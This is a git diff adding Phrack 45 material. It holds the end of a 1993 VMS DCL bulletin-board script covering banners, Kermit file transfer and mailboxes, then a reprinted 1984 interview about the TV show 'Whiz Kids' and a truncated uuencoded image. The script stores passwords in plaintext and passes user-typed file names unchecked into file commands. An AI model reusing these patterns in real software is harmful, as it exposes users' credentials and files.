+$ goto mainmenu
+$! Banner Message
+$ B:
+$ cls
+$ write sys$output " Editing Banner! End With a Dot (.) "
+$ write sys$output " Notice: Pirating or Incorrects Messages Will Be "
+$ write sys$output " Accepted...Don't Be Clean! ;) "
+$ write sys$output "
+$ del [bbs]banner.txt;* /nolog
+$ open/write banner_file [bbs]banner.txt
+$ write banner_file " Banner Message From user ''usr' Posted at ''start' "
+$ write banner_file " "
+$ write banner_file "***********************************************************"
+$ line=1
+$ more:
+$ inquire /nopunctu text "''line': "
+$ if text .eqs. "." then goto endbanner
+$ write banner_file text
+$ line=line+1
+$ goto more
+$ write banner_file "***********************************************************"
+$ close banner_file
+$ write sys$output " "
+$ write sys$output " Banner Saved! "
+$ wait 0:00:02
+$ goto mainmenu
+$!
+$ U:
+$ cls
+$ type [bbs]users.lis
+$ write sys$output " "
+$ write sys$output " "
+$ inquire /nopunctuation komodo "                            Press [ENTER] To Continue..."
+$ goto mainmenu
+$!
+$ L:
+$ goto bbsbye
+$ logout/full
+$!
+$!
+$! option F
+$!
+$ F:
+$ write sys$output " "
+$ write sys$output " "
+$ cls
+$ write sys$output " "
+$ write sys$output "                          Files Menu "
+$ write sys$output " "
+$ write sys$output "                          [1]  List files "
+$ write sys$output "                          [2]  Type a file "
+$ write sys$output "                          [3]  Download a file "
+$ write sys$output "                          [4]  Upload a file "
+$ write sys$output "                          [5]  Go back to main menu "
+$ inquire files "(1,2,3,4,5)==>"
+$ if files .eqs. "1" then goto 1
+$ if files .eqs. "2" then goto 2
+$ if files .eqs. "3" then goto 3
+$ if files .eqs. "4" then goto 4
+$ if files .eqs. "5" then goto 5
+$ if files .eqs. "" then goto F
+$ if files .eqs. " " then goto F
+$ goto F
+$!
+$ 1:
+$ goto fileslist
+$ inquire/nopunct tasto "Press [ENTER] to continue..."
+$ goto F
+$!
+$ 2:
+$ write sys$output "U can't type files such as .ZIP .EXE .ARJ etc..."
+$ inquire file "File to type ? "
+$ if file .eqs. "" then goto f
+$ if file .eqs " " then goto f
+$ if file .eqs. "login.com" then goto F
+$ inquire page "do you want the file to be typed with or without page pause ? (A/B) "
+$ cls
+$ if page .eqs "a" then goto nopage
+$ if page .eqs. "b" then goto page
+$ goto 2
+$ page:
+$ type [bbs]'file' /nopage
+$ inquire/nopunct tasto "Press [ENTER] to continue..."
+$ cls
+$ goto F
+$!
+$ nopage:
+$ type [bbs]'file' /page
+$ inquire/nopunct tasto " Press [ENTER] to continue..."
+$ cls
+$ goto F
+$!
+$ 3:
+$ cls
+$ write sys$output " "
+$ inquire dl "File to download ?  "
+$ inquire protocol "Protocol ? (Z=Zmodem, K=Kermit) "
+$ if protocol .eqs. "z" then goto zmodem
+$ if protocol .eqs. "k" then goto kermit
+$ goto F
+$ kermit:
+$ if dl .eqs. "" then goto F
+$ if dl .eqs. "login.com" then goto F
+$ if dl .eqs. "bbs.com" then goto F
+$ mcr kermit send [bbs.files]'dl'
+$ exit
+$ goto F
+$!
+$ zmodem:
+$ !!!!! Put here your zmodem program download string, etc
+$!
+$ goto F
+$!
+$ 4:
+$ cls
+$ write sys$output " "
+$ out blink
+$ write sys$output " Thanks for your upload! "
+$ out normal
+$ out reverse
+$ write sys$output " Default transfer protocol is Kermit "
+$ out normal
+$ inquire ul "File to upload ?  "
+$ if ul .eqs. "" then goto F
+$ if ul .eqs. "login.com" then goto F
+$ if ul .eqs. "bbs.com" then goto F
+$ mcr kermit rec [bbs.files]'ul'
+$ exit
+$ open/append [bbs.files]files.txt
+$ write [bbs.files]files.txt "File ''ul' sent by ''user' at ''start' on ''device' "
+$ close [bbs.files]files.txt
+$ inquire desc " Please type a short description for your file "
+$ open/append [bbs.files]files.txt
+$ write  'desc'' [bbs.files]files.txt
+$ write [bbs.files]files.txt "----------------------------------------------------------------------"
+$ close [bbs.files]files.txt
+$ goto F
+$!
+$ 5:
+$ goto mainmenu
+$!
+$ M:
+$ cls
+$ write sys$output "                    MailBox Menu   "
+$ write sys$output " "
+$ write sys$output " "
+$ write sys$output "                    [S] Send a Message "
+$ write sys$output "                    [R] Read Messages in Your Mailbox "
+$ write sys$output "                    [C] Clear Your Mailbox "
+$ write sys$output "                    [D] Delete Your Mailbox "
+$ write sys$output "                    [M] Go Back To Main Menu "
+$ write sys$output " "
+$ write sys$output " "
+$ inquire mailmenu " (S,R,C,D,M)==> "
+$ if mailmenu .eqs. "S" then goto smail
+$ if mailmenu .eqs. "R" then goto rmail
+$ if mailmenu .eqs. "C" then goto cmbx
+$ if mailmenu .eqs. "D" then goto delmail
+$ if mailmenu .eqs. "M" then goto mainmenu
+$ if mailmenu .eqs. "" then goto M
+$ goto M
+$!
+$!
+$ delmail:
+$ write sys$output "                      W A R N I N G ! ! !   "
+$ write sys$output "  "
+$ write sys$output "                Deleting Your Personal Mailbox "
+$ write sys$output "             Will Remove You From The Users File "
+$ write sys$output " "
+$ inquire del "Do You Want To Delete Your Mailbox ? (Y/N) "
+$ if del .eqs. "Y" then goto mbxdely
+$ if del .eqs. "N" then goto mbxdeln
+$ goto M
+$!
+$ mbxdely:
+$ goto dmbx
+$ goto M
+$!
+$ mbxdeln:
+$ cls
+$ write sys$output " "
+$ write sys$output "   Mailbox not Deleted "
+$ wait 0:00:02
+$ goto M
+$!
+$ I:
+$ cls
+$ write sys$output " We're sorry if this system isn't 100% working fine. "
+$ write sys$output " We keep on to work at it. If you find bugs and/or errors, "
+$ write sys$output " please send me an URGENT mail (P option at Main Menu) "
+$ write sys$output " Thanks."
+$ write sys$output " "
+$ write sys$output "                              Bbs Staff "
+$ wait 0:00:03
+$ goto mainmenu
+$!
+$P:
+$ cls
+$ write sys$output " "
+$ define/user_mode sys$input sys$command
+$ mail sys$command <YOUR ACCOUNT> !!!!!!!<-- your VMS account, where you can
+$! receive regular vms mail via the vms mail utility
+$ goto mainmenu
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ newusr:
+$!
+$! NEWUSR.COM VERSION 1.0 BETA
+$!
+$ on warning then goto ok
+$ on control_y then goto ok
+$ on error then goto ok
+$ on severe_error then goto ok
+$ set on
+$ in  :== "inquire /nopunctuation"
+$ out :== "write sys$output"
+$!
+$ cls
+$ write sys$output " "
+$ out blink
+$ out " Welcome New User ! "
+$ out normal
+$ out " "
+$ out " "
+$!
+$ in usr  "Username: "
+$ open /read mailfile [bbs]'usr'.mail /error=ok
+$ out " "
+$ out "This Username already Exists."
+$ out " "
+$ wait 0:00:02
+$ exit
+$ ok:
+$ set term/noecho
+$ in pass "Password: "
+$ set term/echo
+$ open /write mailfile [bbs]'usr'.mail
+$ write [bbs]mailfile pass
+$ close [bbs]mailfile
+$ out " "
+$ out "User ''usr' Added To Users File."
+$ out " "
+$ wait 0:00:02
+$ exit
+$ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ ! bsbbye, displays a ascii file and logs user out of the system
+$ bbsbye:
+$ cls
+$ type [bbs]goodbye.txt /nopage
+$ FINISH = F$CVTIME(,,"TIME")
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT "                  S F E R R A  B B S  ( C )  1 9 9 3 "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT "                             L O G O U T "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT " "
+$ WRITE SYS$OUTPUT "                 C A L L  B A C K  S O O N ! ! !"
+$ write sys$output " "
+$ write sys$output  " "
+$ write sys$output  " "
+$ write sys$output  " "
+$ write sys$output  " "
+$ open/append output_file [bbs]users.dat
+$ write output_file "User: ''user' disconnected from ''device' on ''finish'" 
+$ write output_file "-----------------------------------------------------"
+$ close output_file
+$ exit
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ smail:
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$! SENDMAIL.COM VERSION 1.0 BETA
+$!
+$!
+$!
+$ on error then goto nouser
+$ on severe_error then goto nouser
+$ in  :== "inquire /nopunctuation"
+$ out :== "write sys$output"
+$!
+$ cls
+$ out " Write Your Message Below. End With a Dot (.) "
+$!
+$ pass=""
+$ in usr  "From  : "
+$ open /read checkpw [bbs]'usr'.mail /error=wronguspw
+$ set term/noecho
+$ in pw "Password: "
+$ set term/echo
+$ read checkpw pass
+$ if pass .nes. pw then goto wronguspw
+$ if pass .nes. "" then close checkpw
+$ in dest "To    : "
+$ open /append mailfile [bbs]'dest'.mail /error=nouser
+$ in obj  "Object: "
+$ write mailfile "From    : ",usr
+$ write mailfile "To      : ",dest
+$ write mailfile "Object  : ",obj
+$ write mailfile " "
+$ write mailfile "Text  :"
+$ write mailfile " "
+$ line=2
+$ previous:
+$ line=line-1
+$ if line .eq. 0 then line=1
+$ again:
+$ in text "''line': "
+$ if text .eqs. "c" then goto previous
+$ if text .eqs. "." then goto endinput
+$ write mailfile text
+$ line=line+1
+$ goto again
+$ endinput:
+$ write mailfile "------"
+$ close mailfile
+$ out " "
+$ out "Mail Sent."
+$ wait 0:00:02
+$ exit
+$ nouser:
+$ out "The user does not exists, please check the name."
+$ out " "
+$ wait 0:00:02
+$ exit
+$ wronguspw:
+$ out " "
+$ out "You have entered a wrong Username/Password."
+$ out " "
+$ wait 0:00:02
+$ if pass .nes. "" then close checkpw
+$ exit
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ rmail:
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$!
+$!
+$! READMAIL.COM VERSION 1.0 BETA
+$!
+$!
+$!
+$ on error then goto finished
+$ on severe_error then goto finished
+$ in  :== "inquire /nopunctuation"
+$ out :== "write sys$output"
+$!
+$!
+$ out " "
+$ in usr  "Username: "
+$ set term/noecho
+$ in pass "Password: "
+$ set term/echo
+$ open /read mailfile [bbs]'usr'.mail /error=wronguspw
+$ mails=0
+$ read mailfile pw
+$ if pw .nes. pass then goto wronguspw
+$ again:
+$ read mailfile text /end=finished
+$ if text .eqs. "------" then gosub pause
+$ out text
+$ goto again
+$ finished:
+$ close mailfile
+$ if mails .eq. 0 then goto nomails
+$ out " "
+$ out "End of Mails."
+$ wait 0:00:02
+$ exit
+$ nomails:
+$ out "You have no mails."
+$ out " "
+$ wait 0:00:02
+$ exit
+$ pause:
+$ out " "
+$ in more "Press any key to read next mail, press X to exit."
+$ if more .eqs. "X" then goto exitmail
+$ text=CLC
+$ mails=mails+1
+$ return
+$ wronguspw:
+$ out " "
+$ out "You have entered a wrong Username/Password."
+$ out " "
+$ close mailfile
+$ exit
+$ exitmail:
+$ close mailfile
+$ exit
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ cmbx:
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$!
+$! CLEARMAIL.COM VERSION 1.0 BETA
+$!
+$!
+$!
+$ on error then goto mistake
+$ on severe_error then goto mistake
+$ in  :== "inquire /nopunctuation"
+$ out :== "write sys$output"
+$!
+$ cls
+$!
+$ pass=""
+$ in usr  "Username: "
+$ open /read mailfile [bbs]'usr'.mail /error=wronguspw
+$ set term/noecho
+$ in pass "Password: "
+$ set term/echo
+$ mails=0
+$ read mailfile pw
+$ if pw .nes. pass then goto wronguspw
+$ close mailfile
+$ open /write newfile [bbs]usr.tmp /error=wronguspw
+$ write newfile pw
+$ close newfile
+$ delete [bbs]'usr'.mail;*
+$ rename [bbs]usr.tmp [bbs]'usr'.mail /nolog
+$ cls
+$ out " "
+$ out "Mailbox Cleared."
+$ wait 0:00:02
+$ exit
+$ mistake:
+$ cls
+$ out " "
+$ out "An error has occurred, contact Sysop."
+$ out " "
+$ exit
+$ wronguspw:
+$ cls
+$ out " "
+$ out "You have entered a wrong Username/Password."
+$ out " "
+$ wait 0:00:02
+$ if pass .nes. "" then close mailfile
+$ exit
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ Dmbx:
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$!
+$! DELETEMBX.COM VERSION 1.0 BETA
+$!
+$!
+$!
+$ on error then goto nouser
+$ on severe_error then goto nouser
+$ in  :== "inquire /nopunctuation"
+$ out :== "write sys$output"
+$ out " "
+$!
+$!
+$ in usr  "Username: "
+$ open /read mailfile [bbs]'usr'.mail /error=nouser
+$ set term/noecho
+$ in pass "Password: "
+$ set term/echo
+$ read mailfile pw
+$ close mailfile
+$ if pw .eqs. pass then goto deleteit
+$ out " "
+$ out "Wrong Password."
+$ wait 0:00:02
+$ exit
+$ deleteit:
+$ delete [bbs]'usr'.mail;* /nolog
+$ out " "
+$ out "Mailbox Deleted."
+$ out " "
+$ wait 0:00:02
+$ exit
+$ nouser:
+$ out " "
+$ out "This Mailbox doesn't exists!"
+$ out " "
+$ wait 0:00:02
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ fileslist
+$!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+$ fileslist: subroutine
+$ cls
+$ type [bbs.files]files.txt
+$ write sys$output " "
+$ exit
+
diff --git a/phrack45/17.txt b/phrack45/17.txt
new file mode 100644
index 0000000..2b48469
--- /dev/null
+++ b/phrack45/17.txt
@@ -0,0 +1,824 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Five, File 17 of 28
+
+****************************************************************************
+
+
+[While scouring through the fire hazard I call a bedroom, I stumbled upon
+this piece of history.  I don't know how many of you will remember this,
+or moreover, how many of you will appreciate it, but here it is
+anyway.]
+
+---------------------------------------------------------------------------
+(From Video Games, No. 16, January 1984)
+
+Hollywood-Style Bits and Bytes
+
+Whiz Kids' Executive Producer Phil DeGuere Takes You Behind the Scenes
+of His Hit TV Series
+
+by Richard Goodwin
+
+"I want to overcome what appears to be peoples' innate fear of computers
+at an early age to that they won't have any fear nor will be
+particularly in awe of them," says Executive Producer Phil DeGuere of
+his new TV series "Whiz Kids."
+
+At the time he was speaking, it was January and CBS had just given him
+the go-ahead to prepare a pilot.  After the pilot was delivered in
+April, the network gave him a series commitment to produce the
+successive episodes.
+
+It wasn't until this past June that "WarGames" opened and DeGuere, who
+wasn't overly thrilled with the summer smash, goes to great length to
+make people aware that there are no similarities.  In fact, he says, the
+idea was hatched more like a year-and-a-half ago, before WarGames even
+went into production.  DeGuere, a large, slightly rumpled appearing
+Californian, is one of Universal's most successful television producers.
+He has been with the giant studio for nearly a decade and has had a
+string of popular series including "Baa Baa Black Sheep" and the
+current hit, "Simon and Simon."  A long time fan of science fiction,
+DeGuere feels the new series, now seen on Wednesday evenings is living
+up to the original meaning of science fiction.  He's taking today's
+technology and expanding upon it in fictionalized settings.
+
+"The important thing is versilitude and not accuracy," he says while
+seated in his large office.  "You should feel when watching it that it's
+the real thing.  I think we've succeeded in that because consistently,
+computer professionals have enjoyed the pilot and even though they know
+better than anybody that there are impossible things being done in that
+pilot.  It's not like having a Volkswagon fly...it's not that
+impossible."
+
+Computer fans will find many identifiable machines on the show with
+most of the major companies represented in one way or another.  "I've
+got to differentiate between what are essentially props on the one hand
+and working gadgets on the other," DeGuere explains.  "In terms of
+props, you're going to see things like Apples and Ataris.  We have been
+using some Aquariuses from Mattel and if Coleco ever comes up with ADAM,
+I'm sure we'll use that too.
+
+"On the higher tech side, we'll have some of the hot portable computers
+like Gavilan and Compass, all of which basically are things people sit
+at.  There may not be any systems functioning during the course of the
+show.
+
+"When it comes to real working gadgets, it appears that we have
+worked out an arrangement with Xerox to use what is probably the most
+sophisticated personal computer in existence, the Xerox 1100, which is
+such an expensive machine and was responsible for some super-high
+resolution graphics in the pilot.  After some modifications to the
+machine it will be capable of generating some great graphic material."
+
+DeGuere shifts a bit in his chair, runs a hand through his tousled hair
+and adds, "We're into some robots.  We're using one called RB5.  They're
+pretty amazing machines.  RB5 is like an R2D2.  We're planning to
+incorporate it into some classroom situations."
+
+The computer whiz and focal point of the series centers around Richie,
+the "hacker" played by Matthew Laborteaux.  He's surrounded by three
+friends with varying degrees of interest in computers but all love the
+adventures.  There's Hamilton Parker (Todd Porter), the freshman class
+president; Jeremy (Jeffrey Jacquet), the resident jock and Alice (Andrea
+Elson) who wants to belong to the gang.  Richie is also forced to deal
+with a younger sister (Melanie Gaffin) who wants to be in on the action
+but is either too scared or perhaps intimidated a bit by Richie.
+
+The youngsters go to a progressive California high school with a full
+complement of computers and an exasperated teacher who is always bested
+by Richie.  When danger lurks, though, the kids turn to Farley (Max
+Gail, best remembered as Wojo on "Barney Miller"), the crime reporter
+for the local paper.
+
+Originally, the kids were teamed with a younger reporter, but CBS
+decided a more adult, experienced role model was needed to offset the
+youthful exuberance of the stars.  Also representing the adult world is
+a cop named Quinn, played by A. Martinez.  And to keep things
+interesting, the cool and dapper Quinn dislikes Farley, a Damon
+Runyeonesque-type of guy.
+
+As seen in the pilot, the adults do not appear to be the brightest of
+people and DeGuere explains it's done on purpose.  The focus of the
+show is on the kids.  We want them, the underdogs, to succeed.  In order
+for that to happen the adults have to tune them out," he defends.  The
+first story has Richie and the gang bringing down an overambitious
+vice-president of a mammoth conglomerate.  They story, while amusing,
+raised the ire of critics by the cavalier actions of the kids.
+
+At a promotional meeting held early this summer, DeGuere defended his
+show with characteristic bluntness.  "I insulted them personally and I
+insulted their family and I insulted their heritage, their future
+generations, their profession and just about anything else I could think
+up.  The major attention being an attempt to get them off this idea that
+they have uncovered some horrible sin.  I think we were very successful
+in doing that."
+
+DeGuere says his series won't show the kids breaking into computers and
+invading peoples' privacy.  Rather, the repercussions of such actions
+will form the core of some segments.  "We were responsible on those
+subjects from the very beginning," he points out.  "There is something
+synergistic about a computer program.  A computer program does things
+that a computer designer does not always intend.  Even if you sat down
+from scratch.  If the armed forces came to you and said, 'Here's all the
+money and time in the world.  You're going to start from scratch with
+the hardware and software.  Build us a network that is totally secure.'
+I don't think it could be done.  That's one of the things that's so
+fascinating about computers--the program ends up being more than the sum
+of its parts.  Even though, in most states, there are statutes which
+state that accessing another computer system without permission is
+against the law."
+
+"Whiz Kids" will benefit from the experience of two consultants, adding
+a level of technical accuracy other films and television programs have
+missed.  David Gunn worked on the pilot and was signed on by DeGuere for
+the duration of the series.  "He's very knowledgeable in the field of
+microcomputers and I'm fairly knowledgeable myself," he says.  "We have a
+technical advisor on the show who is an investigator for the District
+Attorney's office and is a peace officer who has specialized in computer
+crimes for years.  So, when it comes to areas of legality on the one
+hand and technical accuracy on the other, we go to him.  This is a very
+tiny portion of what's going on in the series.  I personally would
+prefer the technological aspects to be handled as accurately as possible
+and I would rather have it believable than sound stupid.
+
+"In many cases we will have characters spewing a lot of jargon and it
+happens to be true but it's not intended to be something the audience
+has to follow.  It's like medical shows where the doctors are talking
+about this and that," DeGuere explains.
+
+The series will be a fast-paced mixture of adventure and intrigue that
+usually has the kids stumbling upon a problem and then acting quickly to
+stop the crime or criminals without getting caught or killed.  Added to
+the stories will be glimpses of their home lives and interrelationships.
+DeGuere repeats his hope that the show catches on and finds an audience
+so he can have the kids grow and develop, something fairly unique to
+series television.  "If the show clicks, we have it cast in a way that
+allows us to follow them right on through college," he optimistically
+offers.
+
+When not in school, the kids will be clustered around Richie's home
+computer and trying to crack cases.  Richie has built a complicated
+system that would be any hacker's dream including a voice activated
+system named RALF complete with camera and robot appendages (This way
+Richie can eat a sandwich while using both hands to manipulate the
+keyboard).
+
+DeGuere offers some upcoming storylines as examples of the broad mixture
+of the series.  "Richie has a friend who he met at the computer store,
+who happens to be a data processing manager for a local chemical
+company.  As it happens, they have just installed a new computer
+security program and he thinks the best way to test the program is to
+have a hacker like Richie try and break it.  He hires Richie who breaks
+into the system and discovers a Trojan Horse buried in the computer.
+There's a program running inside the computer, developed by a bunch of
+unscrupulous people working at the company.  These people are in the
+process of doing chemical biological warfare of their own, for sale to
+unfriendly third world nations.
+
+"Needless to say, the project manager quickly disappears and Richie is
+the only one who knows he's in trouble.  He doesn't know why but he
+knows his friend is gone.  The kids unravel the mystery."  The show will
+also feature a guest appearance by "Simon and Simon's" Jameson Parker in
+a bid by DeGuere to help link together the two CBS series.  Later in the
+season when the Simons need some computer expertise, they will approach
+Richie.
+
+"Or," DeGuere offers, "There is a computer used in the San Fernando
+Valley linking all the policemen to the department's computer.  It's
+been the subject of a lot of articles because of cost overruns.  Our
+story suggests that a clever criminal can figure out how to emulate one
+of the Mobile Data Terminals or the host computer.  These are a bunch of
+bank robbers who figure out hat with come high tech stuff, they need
+only 15 minutes to get into the banks, get the money and leave.  All you
+have to is make sure all the local police units in the area that could
+respond to the call are unavoidably detained for 15 minutes.
+
+"That's what they're doing at the start of the story.  Everyone thinks
+it's a matter of computer error until Richie says, 'There's no such
+thing as computer error.  It's people error.'  They go on to prove that
+by stumbling on to the criminals."
+
+During the conversation, held long before the series finally premiered
+on October 5, DeGuere points out things are still developing.  "We are,
+at the moment, waiting to see how several different approaches to
+storytelling turn out on film.  Right now, I'm just seeing the rough cut
+of the first episode after the pilot.  So I'd say we're in the gestation
+period right now.  We are not one hundred percent sure of what mutations
+are going to be appropriate for this particular child.  None of the
+things are quite formulated yet.
+
+"We're trying to inject and build into the scripts as many solid
+entertainment values as we can.  We want to have characters you care
+about, relationships that feel real and a general sense of fun rather
+than try and throw everything about computers into it.  We're trying to
+make it high tech on a lot of different levels, not just computers.
+
+"What happens on a new show, based on past experience, is that you don't
+know what is really working.  I don't know until I get a chance to go
+home on Wednesday night and watch the evening news, watch the promos.  I
+like to see how it leads into the movie and by that time, I will have
+begun to have an impression of what we're doing right and what we're
+doing wrong.  Most series hit their peak, in terms of quality, in the
+middle of their second year.  It's true of "Simon and Simon" and it's
+true of almost every other show I've worked on."
+
+The show was originally scheduled to air on Saturday nights but over the
+summer CBS switched it to Wednesday explaining that it would be a better
+opportunity to attract the youthful audience a show like "Whiz Kids"
+needs as a base.  There are more TV sets in use on a Wednesday and the
+competition is diffuse with ABC offering "The Fall Guy" and NBC serving
+up more "Real People."  This gives the show a better chance than if it
+was put up against "Different Strokes," "Silver Spoons" and "T.J.
+Hooker."
+
+"My personal feeling is that the show will be given a reasonable chance
+to succeed.  It will probably mean two or three weeks after the World
+Series and if, by then, it has not established an audience, I do not
+anticipate it will be moved around--I don't know where they could move
+it to, frankly."
+
+As a result of researching the series, DeGuere who owns an Apple at home
+and has an office automation system in place, feels that he is fed up
+with computers.  He complains of not being able to find the interest in
+running programs on his personal computer and has spent weeks getting
+the office system to work properly.  Between that, researching the
+series, watching the critics nitpick "WarGames" apart and the press
+reporting every move made by the nation's hackers (most notably the 414
+gang) he's fed up.  "People are being bombarded about computers
+everywhere they turn.  They take five steps and somewhere you'll be hit
+by the subject.  Consequently, there may be an overkill factor involved.
+The best of all possible ways our series can benefit from "WarGames" is
+if a large number of our potential audience think that "WarGames" was a
+movie they might have wanted to see if they wanted to go to the movies."
+
+Fact or fiction, reality or overkill, Phil DeGuere is hoping that his
+series, co-created with producer Robert Shayne, will find a place in the
+prime-time sweepstakes.  The idea is certainly unique and he is
+fortunate enough to have had the show in development when the rest of
+the world was just beginning to understand the important impact
+computers are having on our lives.  Now, the question remains, do people
+care enough to tune in once a week and watch a group of students battle
+for truth, justice and the American Way using microchips, floppy disks
+and modems instead of guns, badges and sirens!
+
+--------------------------------------------------------------------------
+
+begin 644 whiz.jpg
+M_]C_[0"3061O8F5?4&AO=&]S:&]P,BXU.@!D````9```.$))30/M```````0
+M`&0````!``$`9`````$``3A"24T#\P``````!P``````````.$))30/T````
+M```2`#4````!`"T````&````````.$))30/W```````<``#_____________
+M________________`^@``/_N``Y!9&]B90!D@`````#_VP!#``0"`P,#`@,#
+M`P0%!`0$!0<&!04%!PH*"`8("@H-#0P,#`P-#A`0#PX/#PT0$1$1$A,5%144
+M$A45%145%145%17_P``+"`$1`9`!`1$`_\0`T@````8#`0$!````````````
+M!`4&!P,"`0`("0H+$``!`P($`P4$!`H!#@$#`&L!$0(#!`4`(3$2!@=!"!-1
+M(F%Q@10)D:$R%?"Q0B,*P=$6X?%28C,D%W)#-!B"DADE1%-C)G,U5">B9+*#
+MDZ-TA)3"TC9%LT:DM%;#TU4H&N+RX_/$U.3T976%E:6UQ=7E]69VAI:FML;6
+MYO8W1U=G=X>7I[?'U^?W.$A8:'B(F*BXR-CH^"DY25EI>8F9J;G)V>GY*CI*
+M6FIZBIJJNLK:ZOK_W0`$`#+_V@`(`0$``#\`X[N\3HZ]S4("#IB!2`"5]IQ'
+M,Y3^O%.JXUP.AQ@.(/NQ)'*\-R*8GCJ969AW3$\5RJ&E'=.F)X[D!D]@\"F)
+M65],6;2#C(DI)&/\R%<@?QXC=$'%Q;(T^&>,&)P14UZ'3$+XWAZ%I]J98J6.
+M3KB+//V?1B-%'F\,;(<PU-<8`(C.6IQ&YJYZ8RT`$'48UV9UU.->T;DZ8J[3
+MKBI=T!]F,D(/7&L"N3JF-<Q"3KBH<@)^OPQG-VX>&,)D`<9VC+%FMTQ)FBZ)
+MC!^T=N+MT/1,985.0_CB^IQDE6C/3&8QN!'UXP5!0KC"..-0`J?JQ;<K,L8<
+M2B$]<6:I5<5>I`(7/IC7!P;GF5TQ4$C'_]#F7B2VTM'Q_P#!U]0:6(/9WDFP
+MN#&^X8,N.8K956V"EMMRI9:2B:X0/,!CDE74DG4X;N:)PE<W7,YX<KDER_CX
+MIX.XJN4EMJ*^2C:UE.87`(XYE%(4CJ/#!9<^7=Q@+EMEQA#<R70N(^K"=KN'
+MS"_87N:[PD:0<!)K9+%$7%S2@P%;&[;HF>+PT\LDK&,!<][D#0,R3A35W+KC
+MFEIF5$U@N`C<T.:YL)<"#UR7!#6VNY4;B*JCJ(2#I)&X?C&`VR1VYH:2G08C
+M>)(W%K@6D=#C+9Y4!#G8F;6U#/ROXXEBK:A[<PU/Z3M,2O=&ZD=-OC:0_;L0
+MESAX^@P"GE?')W9;L)S0]`1EB)TQ`1`BKC+9`4&U/'TQ;(G(Y>N,.&B?5C(;
+ME[=,9D"_9]^(SED>N,$9JF8.,E-J:XJ,G@XL'`DC/&"F9&*=5&N-S48D&28L
+M%08NT_9#O#&0,E&N-+?3%D'3ZL9"HF,L"XSIT5<5<"OZL9]VGAC0TEPQ9Z:!
+M<9:S<=S3X8NBDG&=A\HZ],1S-SS*8O-3%E!'/_2<BX__T6OYO<,6R?G"(9;Y
+M26TRQM>]E2`D8`R709G$G&UWN</";.'^_P"'[E3P,1M1`U'N]P)"X:!M%1GA
+MVJJW_P"&MKV1-:'9=T8W%V7M`SQT/V+S+3<M[_*V*4-%:#N`\OV1^+KAY*2I
+M;,PODV#)#O'[<-=SI@HWUE*XQ4(V^8N>P9>&&IXPMD3K'.\,M[_+]J(HX#V+
+MAM7V](PG4X57(_AB:^<V^&K<'F-KJIKWR-"[&LS)^K':E^K[?:(Y623RB-C?
+M--W2Q1)D5=AJ>;O,GA.SPMI7%EUG>2V1E+&#W9`T+W>4'P0XYYXTXOI[A>*J
+MIL]%]U4,FP2QQ(Z0'55(*$G7:@.$OQ/=Z&LAABHZ$4X82Y\CG;GR$ZKX#V8)
+MVN`9KETSPH*8\#S48=4?>E/4AC58P1OB>[J!H0/#7`&^0VV%D'W=5S5=.X-<
+M8YH^[?&[J,B0?:#@NJ"#*\M*M<5!52G[<12$N<7YK^4<9>"'`^BC%?RM=>N-
+M+UR*ZXLU^W+4:K@0WS-5IQNTY$Y8C.J#&`"AR7&[2/%?Q8T-\R'KC2TJB(#H
+MN-VDC3&[2=1KT&-+'=<CC*(F1Q8J570%<7R(ST&-:TM<HTZXEVD.R\,9#%:X
+MG5,L8#"&@(I7%V,<<MH]N+-C.S/ZL4[MX<%.1Q*8B`I&-[D]?'(8P6>/7/%Q
+M'Y44C%XMH<6GPQ7[+CDK1B*1PS.9`PH>(K::;@2Q5;@@JGR$>['_TD%VG+3-
+M+QLZHIQ1/:D#>Y>?SJ^N>F(6\%UE+P5<:N>S6ZH=6Q->)HY?-$`%R!&OL.&=
+M@M[W5TT>TJ"?*.F.G>QU2O;RON49F>Q:UQ+$\K"@_'UP[$(V1/#VL<H.9&$M
+MQ!0P7>XRT@-#'$^%Q,LB$CIHNF&QX^X1BBX6N-4V&B#F1[?S;@ONPTU!P[4S
+M6B2M="YM-$=SYB-&C[6WQUQ+RUXG/#G%M)6V:#XNY,<YD+)00P-<,W%#GDN7
+MOPH^/^9-VJ;YWU5?OC.^B#>Z9$SN:1I(W!C<B2!U.>$+QEQ-4WDQTM,U\U-2
